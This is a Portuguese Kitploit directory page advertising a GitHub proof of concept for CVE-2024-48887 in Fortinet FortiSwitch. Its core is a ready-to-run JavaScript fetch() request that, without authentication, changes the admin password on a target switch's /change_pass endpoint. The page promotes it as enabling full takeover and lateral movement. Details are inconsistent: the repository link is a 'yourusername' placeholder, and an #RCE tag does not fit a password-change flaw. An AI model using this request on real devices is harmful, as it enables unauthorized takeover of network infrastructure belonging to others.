Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-48887-FortiSwitch-Exploit — um snippet JavaScript leve que demonstra como alterações não autorizadas de senha podem ser acionadas em endpoints GUI vulneráveis do Fortinet FortiSwitch. | Kitploit
Ferramentas/GitHubGitHub/cybersecplayground/cve-2024-48887-fortiswitch-exploit
Análise de VulnerabilidadesExploraçãoMovimento LateralExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubcybersecplayground/cve-2024-48887-fortiswitch-exploit

CVE-2024-48887-FortiSwitch-Exploit

um snippet JavaScript leve que demonstra como alterações não autorizadas de senha podem ser acionadas em endpoints GUI vulneráveis do Fortinet FortiSwitch.

Ver Repositório
211há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-48887-FortiSwitch-Exploit

🚨 FortiSwitch CVE-2024-48887 PoC (JavaScript) 🚨

🔥 Acabei de publicar um snippet JavaScript leve mostrando como alterações de senha não autorizadas podem ser acionadas em endpoints GUI vulneráveis do Fortinet FortiSwitch.

🛠️ Sobre a Vulnerabilidade: Um atacante pode criar uma simples requisição fetch() para manipular configurações de senha sem nenhuma autenticação, mirando diretamente variantes do endpoint /change_pass.

fetch('http://target-ip/change_pass', {
  method: 'POST',
  headers: { 'Content-Type': 'application/json' },
  body: JSON.stringify({
    username: 'admin',
    newpass: 'pwned123',
    confirm: 'pwned123'
  })
})
.then(res => res.text())
.then(data => console.log('Response:', data));

💡 Impacto: Assunção total do switch, potencial de movimento lateral e comprometimento da rede.

📁 Repositório: github.com/yourusername/CVE-2024-48887-FortiSwitch-Exploit ⭐ Dê uma estrela no repositório e compartilhe com seu pessoal de infosec!

📢 Acompanhe a análise completa e alertas em tempo real via @cybersecplayground

#JavaScript #infosec #bugbounty #CVE2024 #Fortinet #FortiSwitch #RCE #exploitdev #cybersecurity #PoC #github #OSINT #cybersecplayground

Baixar ferramenta